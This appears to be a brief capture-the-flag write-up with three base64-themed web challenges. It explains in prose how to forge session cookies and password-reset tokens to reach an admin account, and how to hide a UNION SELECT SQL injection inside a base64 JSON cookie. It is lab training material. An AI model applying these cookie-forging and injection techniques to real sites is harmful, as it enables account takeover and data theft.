Base64

The session cookie is a URL-encoded base64 of a JSON string like ‘id-role-username’. Decode it, change the role to 0 and username to admin, re-encode, and access the admin page.

The password-reset token is simply the base64 encoding of the username. Encoding ‘admin’ and passing it as the token query parameter triggers the admin password change flow and reveals the flag.

The server reads a base64-encoded JSON cookie containing an ID field and passes it unsanitised into a SQL query. Inject a UNION SELECT payload inside the JSON, re-encode as base64, and set the forged cookie to extract the flag in three phases.